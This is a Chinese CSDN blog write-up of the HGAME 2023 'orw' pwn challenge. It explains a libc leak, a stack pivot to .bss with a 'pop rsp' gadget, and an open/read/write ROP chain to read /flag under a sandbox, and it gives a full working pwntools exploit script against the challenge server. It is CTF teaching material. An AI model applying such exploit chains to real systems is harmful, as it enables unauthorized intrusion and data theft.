【PWN · ORW | 栈迁移 | ROP】[HGAME 2023 week1]orw

于 2024-01-20 00:24:02 发布
阅读量704 收藏 9
点赞数 8
分类专栏: 【PWN · 高级栈相关】 文章标签: ORW ctf pwn 栈迁移 栈溢出 ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/135709318
版权

这题有些许复杂,但也并没有

前言

ROP的ORW还是第一次做,之前接触到的都是shellcode形式的

利用libc的gadget是个很好的思路,能获得大量有益的gadget

一、题目

 栈溢出但是沙箱,需要orw

 但是溢出长度仅有0x30——需要栈迁移

二、思路

  1. 泄露libc,经典地puts(puts)即可,并且返回到vuln重新触发漏洞
  2. 第二次栈溢出,构造read,利用其将ROP链写到bss段
  3. 写ROP链——open、read、write
  4. 将栈迁移到bss对应位置,这里没有用leave,而是用libc的丰富gadget——pop rsp

三、EXP

from pwn import *
from pwn import p64,u64
context(arch='amd64',log_level='debug')

# libc-gadgets
# 0x0000000000023b6a : pop rdi ; ret
# 0x000000000002601f : pop rsi ; ret
# 0x0000000000142c92 : pop rdx ; ret
# 0x000000000002f70a : pop rsp ; ret
# elf-gadgets
# 0x0000000000401393 : pop rdi ; ret

vuln=0x04012C0
rdi=0x401393
# io=process('./pwn')
io=remote('node5.anna.nssctf.cn',28012)
elf=ELF('./pwn')
libc=ELF('./libc-2.31.so')
# gdb.attach(io)
# input()

### leak_libc
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
payload=b'a'*0x108+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
io.sendlineafter(b'task.\n',payload)
puts_real=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
success('puts_real:'+hex(puts_real))
libc_base=puts_real-libc.sym['puts']
success('libc_base:'+hex(libc_base))

### read_bss
bss_base=elf.bss()
# read(int fd, void *buf, size_t count);
read_real=libc_base+libc.sym['read']
fd=0
buf=bss_base+0x100
count=0x200
rdi=libc_base+0x23b6a
rsi=libc_base+0x2601f
rdx=libc_base+0x142c92
rsp=libc_base+0x2f70a
# payload=b'a'*0x108+p64(rdi)+p64(fd)+p64(rsi)+p64(buf)+p64(rdx)+p64(count)+p64(read_real)+p64(rsp)+p64(buf+8) 
# 利用到这个阶段时,寄存器残留值,可以减少payload的长度,刚好在这里用满了溢出的0x30字节
# p64(rsp)+p64(buf+8),修改rsp的值,+8是因为头部放了flag\x00
payload=b'a'*0x108+p64(rsi)+p64(buf)+p64(read_real)+p64(rsp)+p64(buf+8)
io.send(payload)

### rop->bss
payload=b'/flag'.ljust(8,b'\x00')
# open(const char *pathname, int flags)
open_real=libc_base+libc.sym['open']
pathname_ptr=buf
flags=0
payload+=p64(rdi)+p64(pathname_ptr)+p64(rsi)+p64(flags)+p64(open_real)
# read(int fd, void *buf, size_t count);
fd=3
buf2=buf+0x300
count=0x100
payload+=p64(rdi)+p64(fd)+p64(rsi)+p64(buf2)+p64(rdx)+p64(count)+p64(read_real)
# write(int handle,void* buf,int length)
write_real=libc_base+libc.sym['write']
handle=1
buf3=buf2
length=0x50
payload+=p64(rdi)+p64(handle)+p64(rsi)+p64(buf3)+p64(rdx)+p64(length)+p64(write_real)+p64(vuln)
# payload+=p64(rsi)+p64(buf3)+p64(rdx)+p64(length)+p64(write_real)+p64(vuln)
io.send(payload)

sleep(1)
io.recv()
io.interactive()
Mr_Fmnwon
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn --迁移
zszcr的博客
04-07 6963
迁移主要是为了解决栈溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
hgame2023 week1 writeup
01-15 3984
hgame2023 WEEK1
hgame2023 week3 writeup
02-03 1481
hgame2023 week3
Hgame-2023(前三周pwn题解)
weixin_73290593的博客
02-01 1122
hgame,真好玩
PWN-COMPETITION-HGAME2022-Week1
P1umH0的博客
01-28 1237
PWN-COMPETITION-HGAME2022Week1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orw(unsolved)ser_per_fa(unsol)test_your_nctest_your_gdb Week1 enter_the_pwn_land 栈溢出,需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i ,于是需要小心地覆写 i 的值,让循环顺利执行下去 然后就是常规的ret2libc # -*- coding:
hgame week1 2021 pwn
清霂的博客
04-23 275
目录onceletter once 写这个题的时候发现了一个工具,可以修改题目加载的libc.so和ld.so文件 patchelf 注释掉的是本地环境下的情况 #!/usr/bin/env python2 #env1=ubuntu 16.04 native #env2=ld-2.27.so libc.2.27 from pwn import * arch = "amd64" filename = "once" context(os="linux", arch=arch, log_level="d
hgame2023 week4 writeup
02-13 1259
hgame2023 week4 writeup
2022 hgame pwn wp
weixin_45209963的博客
03-27 4650
2022 hgame pwn wp 本来早就写好了,但是由于复试毕设等等原因拖到今天才发 包括了绝大部分题目,除了算法题spfa和bpwn,剩下一些简单题懒得写了orz 文章目录2022 hgame pwn wpWeek 1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwWeek 2oldfashion_noteechoWeek 3changeable_noteelder_notesized_noteWeek 4vector Week 1 ent
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
栈溢出基础——ROP1.0的例题
07-13
几个pwn的入门题
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
用AIDA模型,分析知乎、小红书和Facebook的广告效果.docx
06-02
用AIDA模型,分析知乎、小红书和Facebook的广告效果.docx
pd27.py1111111111111
最新发布
06-02
pd27.py1111111111111
234_基于微信小程序的车位预约系统的设计与实施-源码.zip
06-02
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯.txt
06-02
蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯
ipython-0.13.1-py2.7.egg
06-01
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
pwn printf 泄露地址
08-19
对于泄露地址,你可以利用格式化字符串漏洞来实现。首先,你需要找到一个可以输出中数据的地方,比如可以通过 `printf` 函数打印的地方。 然后,你可以构造一个格式化字符串,使用 `%x` 格式来读取中的数据。通过不断调整格式化字符串的位置和参数,你可以逐步泄露中的数据。 具体步骤如下: 1. 通过 `%p` 格式化字符串来获取 `printf` 函数在内存中的地址。 2. 分析布局,找到你感兴趣的上变量的相对偏移。 3. 构造格式化字符串,使用 `%x` 格式读取中数据,通过调整参数位置和偏移量,逐步泄露上的数据。 需要注意的是,在实际利用中,你可能需要多次尝试和调整格式化字符串的参数和偏移量,以便准确地泄露目标数据。另外,在漏洞利用过程中,请务必遵循合法和道德的原则,并且只在授权范围内进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值